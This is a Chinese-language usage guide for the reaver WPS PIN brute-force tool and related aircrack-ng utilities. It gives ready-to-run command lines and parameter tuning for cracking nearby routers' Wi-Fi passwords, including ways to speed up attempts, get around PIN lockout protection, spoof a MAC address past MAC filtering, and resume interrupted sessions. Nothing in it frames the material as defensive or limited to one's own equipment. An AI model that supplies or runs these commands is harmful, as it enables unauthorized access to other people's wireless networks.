常用参数

-i      监听后接口名称 网卡的监视接口，通常是mon0

-b     目标mac地址 AP的MAC地址

-a     自动检测目标AP最佳配置

-S     使用最小的DH key，可以提高PJ速度

-vv     显示更多的非严重警告

-d     即delay每穷举一次的闲置时间 预设为1秒

    reaver -i mon0 -b MAC -d 0

    用上述指令可以大幅加快PJ速度 但是有些AP可能受不了

-c （后跟频道数） 指定频道,可以方便找到信号

-p PIN码四位或八位  //已知pin码前4位可以带此参数，指定从这个数字开始pin。可以用8位直接找到密码。

-N 不发送NACK信息（如果一直pin不动，可以尝试这个参数）

-n 对目标AP总是发送NACK，默认自动

-t 即timeout每次穷举等待反馈的最长时间，如果信号不错，可以这样设置

   reaver -i mon0 -b MAC -d 0 -t .5

-m, --mac=  指定本机MAC地址，在AP有MAC过滤的时候需要使用

参数的意思

-a 自动检测目标AP最佳配置

-v      显示信息

-S,-n   把S改n可能会慢一点点 但可以有效防止漏码

-x 20   当出现10次pin尝试都无法收到数据包 休息20秒

-r 100:10  每PIN100次 休息10秒

-I 300  有的路由会有PIN保护 PIN错多少次 起码300秒后才允许你继续PIN

如果遇到那些容易PIN死的路由，建议大家把-S改成-n ，后面可以加上 -t 10 -d 2

-t 10   发送nack 的收包超时 如果t后不加数字 就是收包超时5秒

-d 2    每PIN 后等待2秒后继续PIN下一个

在知道PIN码前四的情况下，可以加上-p XXXX，进度会马上跳到90%。至于知道全部PIN码的，就更简单了。腾达可以算出PIN码，但发现水滴经常PIN出动态密码，这个时候可以尝试下用打气筒来直接PIN出密码。



airmon-ng start wlan0 //启动mon0监控

reaver -i mon0 -b MAC -a -S -vv  //普通用法



如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)



其他命令

airodump-ng mon0 用来扫描周围无线信号

wash -i mon0 -C 这个是用来检测周围无线支持PIN的路由



如果一直pin不动，尝试加-N参数

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N

也可以加延时 -t 3 -b 3



小结-PJ时应因状况调整参数:

信号非常好:

reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1

信号普通:

reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1

信号一般:

reaver -i mon0 -b MAC -a -S -vv -c 1



当出现有百分数时你就可以用crtl+c来暂停，它会将reaver的进度表文件保存在

1.3版：

/etc/reaver/MAC地址.wpc

1.4版：

/usr/local/etc/reaver/MAC地址.wpc

用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，

下次重启动后，再手工复制到/etc/reaver/ 目录下即可。





不是所有的路由都支持pin学习。AP关闭了WPS、或者没有QSS滴，会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)

学习过程中也可随时随地按Ctrl+C终止PJ，重复同一个PIN码 或 timeou t可终止，reaver会自动保存进度。

继续上次的PJ，则再次在终端中发送:

reaver -i mon0 -b MAC -vv

这条指令下达后，会让你选y或n，选y后就继续了

当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了（总共一万一千个密码）。